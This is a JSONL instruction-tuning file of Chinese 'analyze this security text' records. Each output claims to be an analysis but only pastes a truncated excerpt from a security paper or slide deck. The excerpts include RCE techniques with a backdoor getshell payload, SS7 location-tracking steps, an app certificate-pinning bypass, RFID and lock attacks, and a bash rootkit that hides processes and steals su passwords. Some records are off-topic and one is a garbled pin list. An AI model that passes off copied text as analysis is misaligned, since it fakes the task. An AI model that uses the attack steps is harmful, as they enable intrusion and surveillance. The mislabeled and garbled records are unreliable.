{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目录 0 前言与基础概念 1 exec 无过滤拼接 RCE 易 2 任意文件写入 RCE 易 3 文件上传 RCE 中 4 任意登录后台+后台 RCE 易 5 SQL 语句执行+写入权限+绝对路径 RCE 易 6 XSS+electron RCE 易 7 XXE+php 协议 RCE 易 8 SSRF+远程文件下载 RCE 中 9 文件包含 RCE 中上 10 反序列化 RCE 难 11 表达式注入 RCE 中上 12 JNDI 注入 RCE 中上 13 JDBC+反序列化 RCE 中上 14 SSTI 注入 RCE 易 15 缓冲区溢出 RCE 难 16 php 环境变量注入 RCE 难 17 POC/EXP 编写 易 18 Bypass 笔记 易 前言与基础概念 RCE 全称 remote command/code execute 远程代码执行和远程命令执行那么 RCE 的作用呢就相当于我可 以在你的电脑中执行任意命令那么就可以进而使用 MSF/CS 上线你 的主机就可以完全控制你的电脑了所以做渗透中个人认为危害 最大的就是 RCE你 SQL 注入我有 RCE 直接连接数据库你有未 授权/信息泄露我直接查看这些信息你有 XSS我直接改源码你 有弱口令我直接扒下来电脑里存储的密码大多数漏洞能做到的 RCE 都可以轻而易举的做到所以我在做挖洞或代审的时候也更会偏 向 RCE 的挖掘而我在网上发现 RCE 的利用方式有很多并且像是 XSS 到 RCEXXE 到 RCE 这种小众的利用手段有很多人都不知道于 是就有了此文也算是自己的一个简单笔记总结文章吧这篇文章写 的我个人认为很全面了几乎涵盖大部分的 RCE 利用手段了肯定还 有很小众的 RCE 我没发现不过全面的坏处就是不够深都是比较浅 的东西想深入的还是多搜点其他大佬的文章吧 基础的 shell 符号概念 cmd1 | cmd2 只执行 cmd2 cmd1 || cmd2 只有当 cmd1 执行失败后cmd2 才被执行 cmd1 & cmd2 先执行 cmd1不管是否成功都会执行 cmd2 cmd1 && cmd2 先执行 cmd1cmd1 执行成功后才执行 cmd2否 则不执行 cmd2 Linux 还支持分号;cmd1;cmd2 按顺序依次执行先执行 cmd1 再执行 cmd2 php 中也可以用反引号 echo `whoami`; exec 无过滤拼接 RCE 首先是黑盒平常我们看到了敏感的参数比如 ping 啊traceroute 等测试连通性的百分之80都基本都有命令拼接但不一定有RCE 我们以某网关当例子 看到了 ping 和 traceroute输入 127.0.0.1 和 1 然后抓包第一个包记住这个 sessionid要在第二个包的 post 中 添加过去 第二个包我们发现参数过滤了 没有关系用 traceroute 试试 可以看到拼接数据包的时候并没有过滤这样我们就拿下 rce 了 那要是有源代码的话我们该如何审计呢这里以某管理平台做例子 call_function参数直接post进来然后switch判断是ping还是tracert 两边都一样cmd 直接拼接了 post 的参数然后 exec 直接输出 那么直接构造参数就可以造成 rce 我们除了 exec还可以全局搜索 systemshell_exec 等命令函数原 理一样不在赘述以下为某防火墙的小通杀 任意文件写入 当然这些只是单纯的执行命令在 php 中还有 file_put_contents 这 种可以写入的函数例子如下这是之前 bc 站的源码应该是一个 小后门,google88990 接受传参然后 file_put_contents 直接拼接进去 写入文件 直接构造 payload xxx/xxx/xxx/xx/xxx/GoogleChartMapMarker.php?google88990=phpin fo(); 就可以直接 getshell 了 文件上传 大家用的最最常见的 rce 方法应该就是文件上传了这里拿我之前写 过的一篇作为案例 这里下载源代码 RiteCMS - download 访问 admin.php然后输入默认账密 admin admin再次访问 admin.php 进入后台 File Manager Upload file 选择文件 OK-Upload file Admin.php 中进入到 filemanage.inc.php 文件 进入之后看到fileupload函数这里new一个类把对象赋值到upload 然后全局搜索 这里赋值了 upload 和 uploaddir 参数 继续往下走 在 73 行 有 move_uploaded_file 函 数 进 行 上 传  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1586-002-盗取账户-电子邮箱账户 ## 来自ATT&CK的描述 攻击者可能会盗用可在攻击目标过程中使用的电子邮件账户攻击者可以使用被盗用的电子邮件账户来推进他们的行动例如利用它们来进行信息钓鱼或网络钓鱼如果潜在的受害者与被攻击的角色有关系或者知道被攻击的角色那么利用现有的角色与被攻击的电子邮件账户可能会使他们产生一定程度的信任被入侵的电子邮件账户也可用于获取基础设施例如域名 盗取电子邮件账户的方法有很多例如通过钓鱼网站收集信息从第三方网站购买证书或通过暴力破解例如从违规凭据转储中重用密码简单理解撞库在盗取电子邮件账户之前攻击者可能会进行侦察以决定破坏哪些账户来推进其行动 攻击者可以利用被入侵的电子邮件账户来劫持与感兴趣的目标的现有电子邮件线程 ## 测试案例 很好理解这里不做任何案例说明 ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 ### 缓解措施 这种技术不容易用预防控制来缓解因为它是基于企业防御和控制范围之外的行为 ### 检测 大部分此类活动将在目标组织的可见性之外进行因此很难检测到这种行为检测工作可能集中在攻击生命周期的相关阶段例如在初始访问期间例如网络钓鱼 ## 参考推荐 MITRE-ATT&CK-T1586-002 <https://attack.mitre.org/techniques/T1586/002/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOff Grid communica.ons with Android m0nk and stoker have fun @ DefCon 20 - Meshing the mobile world Who are you guys?  m0nk  Josh Thomas  jbthomas@mitre.org  m0nk.omg.pwnies@gmail.com  Stoker  Jeff Robble  jrobble@mitre.org  mistr.stoker@gmail.com  We work @ The MITRE Corpora.on (of CVE fame) tl; dr:  hTps://github.com/monk-dot A placeholder so m0nk can babble Where data goes to die  Fukushima  Katrina  Hai.  < Insert your favorite recent natural disaster here >  Other? Why do I care about Mesh networks?  Physical infrastructure is prone to failure, networks shouldnt be  Bypass the Cellular networks  Bypass Wi-Fi networks  Share informa.on when infrastructure is broken or untrustworthy  Extend and bounce other networks via bridging / tethering  Headless Ok, kind of cool. What about Off Grid?  Single point of failure = single point of sniffing / filtering  I dont trust someone else being able to turn off my network, do you?  When you want to share info, but don't want anyone watching J There should really be a funny pic below Your pocket contains more than a consump.on device for Grumpy Fowl  Wi-Fi chip with a fairly fat pipe  Cell modem and baseband processor  A ton of sensors  (Somewhat) quality NAND and RAM  A very under clocked and underu.lized processor  Power  A boring screen that blinks! The SPAN framework  We did the boring stuff so you dont have to!  General Overview of the framework, what / why / how  Harnessing SPAN for your own project?  Repurpose root to muck with your Wi-Fi chipset SPAN + Android Technical Architecture Blinkie on a Map Java Networking Interface TCP Socket UDP Socket MANET Service Reliable Transmission Layer Security Manager Session Manager P2P Chat App. Other App. Network Configura.on Modular MANET Rou.ng Protocol Framework Manual Rou.ng Protocol Selec.on Automated Rou.ng Protocol Selec.on Proac.ve Rou.ng Protocol Manager Reac.ve Rou.ng Protocol Manager OLSR BATMAN Protocol 3 DSR Protocol 2 Protocol 3 iptables / neoilter Linux Kernel Rou.ng Tran", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking mobile network via SS7: interception, shadowing and more Dmitry Kurbatov Vladimir Kropotov Positive Research Agenda  Intro  Attacks prerequisites, costs and case studies  Official and underground market brief  Possible Security measures  Forecasts In Service LTE Networks VoLTE Networks http://ltemaps.org/ The most of the world performs HANGDOVER LTE only for web browsing To perform a call subscriber is downgraded to 3G (handover) Interconnect / roaming SS7 E1 GRX IP IPX IP 2G / 3G 3G / 4G 3G / 4G Kind of IPv4 vs IPv6 dilemma Mobility Call control Billing Crypto SS7 is still most used interconnect/ roaming network SS7 SS7 A B MSC VLR Gateway MSC SMS-C HLR Billing 2014 - year of SS7 security issues Hackito Ergo Sum 2014  Locating mobile phones Positive Hack Days IV  How to Intercept a Conversation Held on the Other Side of the Planet Washington Post  Secretly track cellphones 31C3  SS7: Locate. Track. Manipulate  Mobile self-defense SS7 for (bad) guys Tracking  Locating mobile phones and secretly tracking Denial of Service  Disrupt subscriber connectivity and service availability Interception  Listen to calls, intercept short messages Threats to Operator Threats to IoT Basic Terms  IMSI ~ SIM Card  IMEI ~ Device  MSISDN ~ Your Number  HLR ~ Subscriber DB  MSC ~ Call Processing Tracking / 跟踪(位置) SMS-C MSC HLR 1 2 Common Step 0 for Any Attack 1. Attacker sends request SendRoutingInfoForSM addressing MAP message by MSISDN 2. HLR replies with:  own address  serving MSC address  IMSI I am SMSC Bob SMS-C MSC HLR 1 2 Get Cell ID 1. Attacker sends request provideSubscriberInfo addressing MAP message by IMSI and asking for subscriber location 2. MSC replies with Cell ID:  MCC - 250  MNC - 90  LAC 4A67  CID 673D I am SMSC Bob Get Location MCC: 250 MNC: 90 LAC: 4A67 CID: 673D 1 Search in Internet for physical location by MCC, MNC, LAC, CID Bob and Track User Just Like SkyLock http://s3.documentcloud.org/documents/1275167/skylock-product-description-2013.pdf Underground m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFranz Payer Tactical Network Solutions http://cyberexplo.it Acknowledgements q Zachary Cutlip q Craig Heffner q Tactical Network Solutions Special Thanks q Ronald Jenkees  Independent artist  http://www.ronaldjenkees.com Legal q EFF (www.eff.org) q DMCA (Digital Millennium Copyright Act) q CFAA (Computer Fraud and Abuse Act) q Opinions/views expressed here are mine, not my employers What Im going to talk about q Background info q Music streaming basics q Security investigation process q Exploit demo q Questions End-Goal q Google-Chrome Extension  Mimics music player when possible  Duplicates requests otherwise q Alternative  Duplicates request + caches  Hex-dump analysis Wall of shame What is streaming? q A way to constantly receive and present data while it is being delivered by a provider  Wikipedia q Capture data pieces  Reassembly  Encryption What is streaming? q Protocols  Custom protocol  Desktop apps  HTTP/HTTPS  Browser apps q 2 types  Static  http://cd09.128.music.static.jango.com/music/10/47/34/1047349946.mp3  Dynamic  http://stream126-he.grooveshark.com/stream.php? streamKey=1202c0ba6260e12c0b84d64b72845181d3195496_51eaabf9_24f1b 63_2cb51a8_e0616020_36_0 Types of music players q Flash  Majority  May still use JavaScript  Must decompile  Separate environment q HTML5  Experimental  Entirely in JavaScript  Usually minified Wheres the vulnerability? q Browser does heavy lifting q Two ways to exploit  Copy requests  Easy  Suspicious  Limitations  Generate requests  Difficult  Undetectable w/ sessions Investigation process q Breadth before depth q Locate music file in network traffic  Filter by XHR traffic + sort by type q Inspect any parameters in the request q Locate origin of those parameters  Page URL  Page source  localStorage  JavaScript q Attempt to replicate the request Target: Aimini q Flash q Almost nonexistent security q Good first target  Dont even need to look at the code Analyzing network traffic The easy way out The easy way out Analyzing the son", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 從GDPR看言論自由與被遺忘權 中華民國電腦稽核協會 Computer Audit Association 國際電腦稽核協會 台灣分會 ISACA Taiwan Chapter service@isasa.org.tw Hacks in Taiwan Conference Community 2018 2 報告人簡歷 1 3 2 姓名 張紹斌 經歷 司法官班第33期結業 智慧財產及電腦犯罪專組主任檢察官 東吳法研所科技法律組兼任助理教授 行政院資通安全稽核委員 司法官學院講座 學歷 政治大學法律學系學士 交通大學科技法律研究所碩士 廈門大學知識產權研究院博士生 4 現職 中華民國電腦稽核協會理事長 合盛法律事務所律師 bin@hosheng-law.com 3 目錄 CONTENTS 從數位紋身發韌的隱私思考 被遺忘權起源及涉及之權利主體 人格權財產價值 被遺忘權與表現自由之調和 結論與建議 4 從數位紋身發韌的隱私思考 被遺忘權之起源 5 數位記憶對隱私的衝擊 1945 1 Vannevar Bush在大 西洋月刊裡發 表機器複製及 擴增人類記憶 之文章 1998 2 J.D.Lasica 在 網路上發表 網路永遠不 會忘記之文 章 2009 3 Gordon Bell 在Total recall 書中主張 電子記憶革 命能完全改 變世界 2015 4 反之Viktor Mayer- Schönberger 害怕滴水不露 的數位記憶 可能造就數位 版的圓形監獄 6 被遺忘權之起源 案件  歐盟法院Google Spain SL ,Google Inc. VS Agencia Española de Protección de DatosAEPD, Mario Costeja González 2014案判決  被遺忘權一詞係 Costeja González 所提出及主張西班牙高等 法院亦請求歐盟法院就 Costeja González 是否有被遺忘權為先 決裁判然而歐盟法院在判決理由內並未提及被遺忘權一詞  歐盟 2018 年 5 月 25 日生效之 GDPR 第 17 條其條文名稱直 接標明為刪除權被遺忘權明文承認被遺忘權權利存在 當事人 GDPR 7 歐盟法院與GDPR關於被遺忘權比較 歐盟法院 1. 被遺忘權行使對象限定在 搜尋引擎業者 2. 行使之客體限定在刪除搜 尋引擎搜尋結果之連結 3. 行使之例外 A. 是否基於歷史統計或科學 目的而需要保留此個人資料 B. 是否有特別理由證明公眾獲 取該個人資料具有優勢利益 其中所舉特別理由之例子為 個人資料主體在公共領域中 擔任特定角色 GDPR 1. 被遺忘權行使對象包含搜尋引擎 業者網路平台業者 2. 行使之客體包含刪除搜尋引擎搜 尋結果之連結刪除個人資料本身 3. 行使之例外 第17條第3項規定之態樣 A. 為了行使表現自由權及資訊自由權之 必要範圍內 B. 依據法律 C. 為了公共健康 D. 為了儲存檔案之目的 E. 為了科學歷史研究目的或統計目的 F. 為了法律上請求之主張行使或防禦 更加細緻化地規定以調和被遺忘權與其 他基本權利之衝突 8 美國關於被遺忘權之實務  著重言論自由法院目前見解不承認被遺忘 權存在  僅有加州未成年人在數位世界之隱私權法有 限度地承認被遺忘權惟規定僅保護18歲以 下之未成年人且未成年人只能要求刪除自 己張貼之內容或資訊至於第三人重新張貼 未成年人前所張貼之內容或資訊則無法要 求刪除 9 中國大陸關於被遺忘權之實務  中國大陸目前尚未立法承認被遺忘權北京 市第一中級人民法院在任甲玉與百度民 事訴訟案雖不採納原告被遺忘權之主張 然提出3個判斷標準 1. 非類型化權利涵蓋之利益 2. 具有利益的正當性 3. 具有保護的必要性  不能排除此3個判斷標準可作為將來被遺忘 權案件之判決標準 10 日本關於被遺忘權之實務  目前亦未立法承認被遺忘權最高裁判所在逆轉事件 裁判可認為係承認被遺忘權  最高裁判所在2017年平成29年1月31日搜尋引擎 業者案件就隱私權與表現自由間衝突之衡量提出 下列判斷標準 1. 個人資料內容之性質 2. 因提供連結該個人資料被傳送之範圍及個人資料主體受 到具體的損害程度 3. 個人資料主體社會地位或影響力 4. 個人資料刊登利用之目的或意義及其必要性 5. 個人資料刊登利用當時之社會狀況與其後之變化 6. 個人資料內容顯示個人資料主體之行為是否受到社會的 強烈非難及該行為是否係以刑罰禁止 因此日本法院並未完全否定被遺忘權存在上開考量 因素亦可作為將來被遺忘權案件之判決標準 11 我國關於被遺忘權之實務案例 12 我國關於被遺忘權之實務案例 1  施建新訴Google案搜尋引擎業者 1. 臺北地方法院103年訴字", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe follow steps can be used to bypass the certificate pinning used by the August Smart phone app without needing to jailbreak the device. Step 1: Open settings Step 2: Press and hold the application version number. Step 3: Enter \"DreadfulDow\" in the prompt. The prompt is case sensitive. Step 4: Tap on https://apiproduction.august.com to change webservice the application will use. Step 5: Tap other to specify a custom url. Step 6: Enter url of server you control which can relay requests to August's server. (Both HTTP and HTTPS can be used.) Step 7: Monitor to, modify, and otherwise mess with traffic between the app and the August services.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPAC101 PAC102 COC1 PAC201 PAC202 COC2 PAC301 PAC302 COC3 PAC401 PAC402 COC4 PAC501 PAC502 COC5 PAC601 PAC602 COC6 PAC702 PAC701 COC7 PAC802 PAC801 COC8 PAC901 PAC902 COC9 PAC1002 PAC1001 COC10 PAC1101 PAC1102 COC11 PAC1201 PAC1202 COC12 PAC1301 PAC1302 COC13 PAC1401 PAC1402 COC14 PAC1501 PAC1502 COC15 PAC1701 PAC1702 COC17 PAC1801 PAC1802 COC18 PAC1901 PAC1902 COC19 PAC2001 PAC2002 COC20 PAC2101 PAC2102 COC21 PAC2201 PAC2202 COC22 PAD103 PAD102 PAD101 COD1 PAL102 PAL101 COL1 PAP100 PAP101 PAP102 PAP103 PAP104 PAP105 COP1 PAP205 PAP204 PAP203 PAP202 PAP201 COP2 PAP305 PAP304 PAP303 PAP302 PAP301 COP3 PAP405 PAP404 PAP403 PAP402 PAP401 COP4 PAP505 PAP504 PAP503 PAP502 PAP501 COP5 PAP605 PAP604 PAP603 PAP602 PAP601 COP6 PAP7010 PAP709 PAP708 PAP707 PAP706 PAP705 PAP704 PAP703 PAP702 PAP701 COP7 PAP801 PAP802 PAP803 PAP804 PAP805 PAP806 PAP807 PAP808 PAP809 PAP8010 COP8 PAP9010 PAP909 PAP908 PAP907 PAP906 PAP905 PAP904 PAP903 PAP902 PAP901 COP9 PAQ103 PAQ101 PAQ102 COQ1 PAR101 PAR102 COR1 PAR201 PAR202 COR2 PAR301 PAR302 COR3 PAR401 PAR402 COR4 PAR501 PAR502 COR5 PAR601 PAR602 COR6 PAR701 PAR702 COR7 PAR801 PAR802 COR8 PAR901 PAR902 COR9 PAR1001 PAR1002 COR10 PAR11012 PAR1108 PAR1106 PAR1104 PAR1102 PAR1101 PAR11014 PAR11010 PAR11016 PAR11015 PAR11013 PAR11011 PAR1109 PAR1103 PAR1105 PAR1107 COR11 PAR12012 PAR1208 PAR1206 PAR1204 PAR1202 PAR1201 PAR12014 PAR12010 PAR12016 PAR12015 PAR12013 PAR12011 PAR1209 PAR1203 PAR1205 PAR1207 COR12 PAR13012 PAR1308 PAR1306 PAR1304 PAR1302 PAR1301 PAR13014 PAR13010 PAR13016 PAR13015 PAR13013 PAR13011 PAR1309 PAR1303 PAR1305 PAR1307 COR13 PASW101 PASW102 COSW1 PAU1015 PAU1016 PAU1017 PAU1018 PAU1019 PAU1020 PAU1021 PAU1022 PAU1023 PAU1024 PAU1025 PAU1026 PAU1027 PAU1028 PAU1014 PAU1013 PAU1012 PAU1011 PAU1010 PAU109 PAU108 PAU107 PAU106 PAU105 PAU104 PAU103 PAU102 PAU101 COU1 PAU2044 PAU2043 PAU2042 PAU2041 PAU2040 PAU2039 PAU2038 PAU2037 PAU2036 PAU2035 PAU2034 PAU2033 PAU2032 PAU2031 PAU2030 PAU2029 PAU2028 PAU2027 PAU2026 PAU2025 P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCAN I haz car secret plz? Javier Vazquez Vidal Henrik Ferdinand Nölscher Who are we?  Javier is a Hardware Security Specialist  Works at Code White as a Product Security Engineer  He is from Cadiz (Spain)  Enjoys reversing products that are interesting, or could potentially be more fun  Likes ake hen its not a lie and bbqs Who are we?  Ferdi works as an Information Security Specialist at Code-White in Ulm  Among many things, he likes pwning stuff, lasers and BBQs  Likes big busses and he cannot lie What options did we have? Current Car Hacking status  Focus is on the CAN bus  Replay attacks and/or packet injection  Some researchers also found remote exploits to take control of certain vehicles  There are some tools to help understand the UDS protocol  Chiptuning is actually hacking  ECUs are cloned  Internal data is manipulated  OEM specific Diagnostics are more fun than standard ones Is there anything else? So, whats the secretz?  UDS is not the only protocol  TP2.0 (Tunneling Protocol) is the CAN version of KWP2000  Both offer a series of services which are very interesting, but often not taken into consideration.  With use of these services, a lot of Information can be gathered and modified. UDS VS TP 2.0 -> TP 2.0 Channel Negotiation UDS VS TP 2.0 -> TP 2.0 Transmission UDS VS TP 2.0 -> UDS Transmission Some of the differences between UDS and TP SIDs The most interesting Services  SecurityAccess (0x27): Allows access to restricted Services  ReadMemoryByAddress (0x23): Allows to read certain memory addresses  Read/WriteDataByID(0x22/0x2E): Allows to read/write certain parameters  RequestUpload(0x35): Service used to retrieve firmware from the ECU  RoutineControl3: Allos to start routines, hih hae different effets Say hello to the CANBadger! CANBadger Hardware Overview  Powered by mBed LPC1768 or LPCXPresso LPC1769  128KB XRAM  2x DB9 CAN Interfaces + 2x Debug headers  SD card  ECU Power control by software  UART  4 GPIOs  Standalone mode, USB mode (CDC Device), o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n返璞归真 重识物理安全与近源渗透 返璞归真 重识物理安全与近源渗透 PushEAX CONTENTS 目录 01 02 03 第一章 近源威胁面分析 第三章  ANT Tools工具包介绍 第二章 近源渗透手段 近源威胁面分析 虽然只有极少黑客选择在真实世界发起进攻 但我们面对的威胁远不止与此 01 谁会选择在现实世界发起攻击 2007年网络托管商CI Host的数据中心遭到两名蒙面男子抢劫 劫匪在持枪劫持了一名IT员工后盗窃了20台服务器 黑客攻击(物理) 攻击者通过贿赂内部员工在厂区内安装无线路由器利用无线 信号直接连入企业内网侵入内网中的信息系统 通过为他人改机解锁手机共9000余部五个月违法所得 300余万元 前员工入侵富士康网络疯狂洗白iPhone获利300万 外部威胁 近源 威胁 高级黑客 / APT组织 / 间谍 服务提供商 / 硬件供应链 盗窃 / 数据取证 内部威胁 恶意的内部人员 因疏忽或无知造成的威胁 案例1五十年前的键盘记录器 1970年代苏联为窃取机密在物 流阶段截取了美国大使馆的打字机 植入了一个完全由机械结构构造的键 盘记录器 案例4数据取证技术 案例3淘汰设备泄露数据 2019年某互联网公司淘汰机房交换机时未 清除设备NVRAM中的配置信息 泄露了其中的设备登录密码的Hash内网IP信 息VLAN信息BGP和OSPF配置等等 案例2震网的攻击源自于间谍带入 的U盘 荷兰情报机构策反了一名伊朗工程师将带有 病毒的USB闪存驱动器带入了核电站的内部系 统 案例5主板内置广告软件 国内外多个笔记本电脑生产厂家曾被发现在 主板的固件程序中内置广告驱动管理等软 件 即使在更换硬盘并重装系统后在引导过程中 也会被安装特定程序 近源渗透手段 近源渗透不止BadUSB 02 接触时间 短 长 接触难度 低 高 第二类攻击手段 攻击者所需的接触时间长或接触难度大 第一类攻击手段 攻击者所需的接触时间短 或接触难度小 第三类攻击手段 攻击者在一定时间内可以完全控制目标设备或 者可以改变其内部硬件或固件 第一类攻击手段 特点所需的接触时间短或接触难度小 攻击者常见为红队成员外部黑客 目标钓鱼攻击无线设备裸露的接口 第二类攻击手段 特点所需的接触时间长或接触难度大 攻击者带有良好的条件常见为企业内鬼 目标计算机终端服务器KVM等 第三类攻击手段 特点在一定时间内可以完全控制目标设备或可以 改变其内部硬件或固件 攻击者APT组织恶意的硬件供应商 目标硬件设备内部组件设备固件 近源渗透手段 社会工程学 / 钓鱼 第二类近源攻击 攻击无线设备 植入硬件后门 第一类近源攻击 第三类近源攻击 撬锁 攻击计算机终端 数字取证 供应链投毒 终端机 / 裸露接口 一: 社会工程学攻击 身份伪装 1. 伪装为外卖员快递员 2. 伪装为面试者维修工 钓鱼 / 水坑攻击 1. 投递BadUSB及类似设备植入硬件后门 2. 在公共设备上安装后门 信息收集 1. 盗取访问凭证工牌图案及UID文档公章 2. 废弃文件设备的收集 二: 攻击无线设备 无线网络 1. 跑包握手包 / WPS Pin爆破 2. 钓鱼热点 RFID类设备 1. ID卡的拷贝爆破 2. IC卡的破解拷贝 无线电锁具 1. 无线信号的重放攻击 攻击无线设备RFID锁具 主要分为ID卡和IC卡 1. ID卡较为古老但廉价内部只有一个ID号 2. IC卡内部有存储器并且可以加密数据 最广泛使用的是NXP的Mifare系列IC卡 1. 包含1K或4K的存储空间每张卡有一个UID号 2. 由于存在多个已知漏洞容易被破解 攻击手段 1. 使用带有NFC功能的手机进行破解 2. 使用PN532进行破解 攻击无线设备M1卡的破解 结构 1. 含有1K存储空间 2. 分为16个扇区每个扇区包含两个访问密钥 UID 1. 扇区0的区块0为厂商信息原则上只读 2. 扇区0的区块0-3为卡片UID 常见安全问题 1. 门禁只校验UID造成加密失效 2. 使用默认Key或弱Key 攻击无线设备无线电锁具 使用无线电遥控的锁具 1. 常见于门禁车库栏杆 2. 也可用于偷电瓶 通过某个频段的无线电进行通讯 1. 常见为315Mhz433Mhz 2. 开锁时遥控器会发送一段码 攻击手段 1. 针对固定码可直接重放攻击 2. 针对滚动码需要破解出码的生成规律 攻击无线设备HACKCUBE 功能 1. EM41xx卡的读取和模拟 2. 315433Mhz无线电信号重放爆破 3. 通过Wi-fi远程进行HID注入 4. 1Ghz以下频段的干扰 HackCube 开源的无线电审计硬件平台 由360 UnicornTeam开发 三: 终端机裸露接口 终端机的逃逸 1. 双击或长按呼出右键菜单 2. 通过屏幕键盘呼出", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PNG <p align=\"center\"> <img src=\"../../../../assets/img/banner/png.jpg\" width=\"70%\"></a> </p> > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- ## 什么是PNG PNG 是 20 世纪 90 年代中期开始开发的图像文件存储格式其目的是替代 GIF 和 TIFF 文件格式同时增加一些 GIF 文件格式所不具备的特性流式网络图形格式 (Portable Network Graphic FormatPNG) 名称来源于非官方的 PNG's Not GIF是一种位图文件(bitmap file) 存储格式读成pingPNG 用来存储灰度图像时灰度图像的深度可多到 16 位存储彩色图像时彩色图像的深度可多到 48 位并且还可存储多到 16 位的 α 通道数据PNG 使用从 LZ77 派生的无损数据压缩算法 --- ## 文件结构 PNG 图像格式文件由文件署名和数据块(chunk)组成 <p align=\"center\"> <img src=\"../../../../assets/img/Security/Reverse/FILE/PNG/PNG图像格式.png\" width=\"80%\"></a> </p> ### 文件署名域 8 字节的 PNG 文件署名域用来识别该文件是不是 PNG 文件该域的值是 | 十进制数 | 十六进制数 | | - | - | | 137 | 89 | | 80 | 50 | | 78 | 4e | | 71 | 47 | | 13 | 0d | | 10 | 0a | | 26 | 1a | | 10 | 0a | 其中第一个字节 0x89 超出了 ASCII 字符的范围这是为了避免某些软件将 PNG 文件当做文本文件来处理文件中剩余的部分由3个以上的 PNG 的数据块Chunk按照特定的顺序组成因此一个标准的 PNG 文件结构应该如下 ``` PNG 文件标志|PNG 数据块||PNG 数据块 ``` ### 数据块 这里有两种类型的数据块一种是称为关键数据块(critical chunk)就是必须要有的块另一种叫做辅助数据块(ancillary chunks)这是可选的数据块 每个数据块都由下表所示的的4个域组成 | 名称 | 字节数 | 说明 | | - | - | - | | Length(长度) | 4字节 | 指定数据块中数据域的长度其长度不超过$(2{31}-1)$字节 | | Chunk Type Code(数据块类型码) | 4字节 | 数据块类型码由 ASCII 字母(A-Z和a-z)组成 | | Chunk Data(数据块实际内容) | 可变长度 | 存储按照 Chunk Type Code 指定的数据 | | CRC(循环冗余检测) | 4字节 | 存储用来检测是否有错误的循环冗余码 | 其中 CRC(cyclic redundancy check)域中的值是对 Chunk Type Code 域和 Chunk Data 域中的数据进行计算得到的可以看做一种校验码 #### 关键数据块 关键数据块中的4个标准数据块是 **IHDR 文件头数据块(header chunk)** 它包含有 PNG 文件中存储的图像数据的基本信息并要作为第一个数据块出现在 PNG 数据流中而且一个 PNG 数据流中只能有一个文件头数据块 文件头数据块由 13 字节组成结构如下 | 域的名称 | 字节数 | 说明 | | - | - | - | | Width | 4 bytes | 图像宽度以像素为单位 | | Height | 4 bytes | 图像高度以像素为单位 | | Bit depth | 1 byte | 图像深度索引彩色图像124 或 8 ; 灰度图像1248 或 16 ; 真彩色图像8 或 16 | | ColorType | 1 byte | 颜色类型0灰度图像, 1248 或 16;2真彩色图像8 或 16;3索引彩色图像124 或 84带α通道数据的灰度图像8 或 16;6带α通道数据的真彩色图像8 或 16 | | Compression method | 1 byte | 压缩方法 (LZ77 派生算法) | | Filter method | 1 byte | 滤波器方法 | | Interlace method | 1 byte | 隔行扫描方法0非隔行扫描; 1 Adam7(由 Adam M. Costello 开发的 7 遍隔行扫描方法) | **PLTE 调色板数据块(palette chunk)** 它包含有与索引彩色图像((indexed-col", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom Crypto.Util.number import getPrime, getRandomRange, GCD def getBlumPrime(nbits): p = getPrime(nbits) while p % 4 != 3: p = getPrime(nbits) return p def genKey(nbits): p = getBlumPrime(nbits/2) q = getBlumPrime(nbits/2) N = p * q return ((p,q), N) def randQR(N): return pow(getRandomRange(1, N), 2, N) def encrypt(m, N): return pow(m, 2, N) def legendreSymbol(a, p): return pow(a, (p-1)/2, p) def decrypt(c, p, q): if GCD(c, p*q) != 1: return None if legendreSymbol(c, p) != 1: return None if legendreSymbol(c, q) != 1: return None return pow(c, ((p-1)*(q-1) + 4) / 8, p*q)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSHELL Hacking 阿里云 - wzt  When  control  a  unix-like  system,   Than?   [root@localhost fucking_rootkit]#  ls Makefile furootkit.c [root@localhost fucking_rootkit]#  make make  -C  /lib/modules/2.6.32/build  M=/root/lkm/fucking_rootkit modules make:  ***  /lib/modules/2.6.32/build:  No  such  file  or  directory.   Stop. make:  ***  [furootkit]  Error  2 [root@localhost fucking_rootkit]#  gcc bash:  gcc:  command  not  found [root@localhost fucking_rootkit]# [root@localhost fucking_rootkit]#  perl bash:  perl:  command  not  found [root@localhost fucking_rootkit]# [root@localhost fucking_rootkit]#  python bash:  python:  command  not  found [root@localhost fucking_rootkit]# Do  everything  in  SHELL  Unix  kiss  philosophy Ø keep  it  sample  stupid. Ø do  one  thing  do  it  well.  The  goal  of  shell  scripts Ø no  cpu arch  depend Ø no  complier  depend  Ø no  interpreter  depend Ø no  os and  kernel  distribution  depend Ø sh/bash/csh/zsh Ø unix/bsd/solaris/linux Ø hundreds  of  open  source  tools Ø just  a  shell  script? Bash  Rootkit  Histroy of  bash  rootkit ü If  bash  shell  scripts  can  be  designed  for  security  tools  like  chkrootkit or  rkhunter,  ü so  too  can  it  be  implemented  for  a  rootkit.  Brootkit ü Lightweight  rootkit  implemented  using  bash  shell  scripts. ü FEATURES I. more  hidable ability  against  admintrator or  hids. II. su passwd thief. III. hide  file  and  directories. IV. hide  process. V. hide  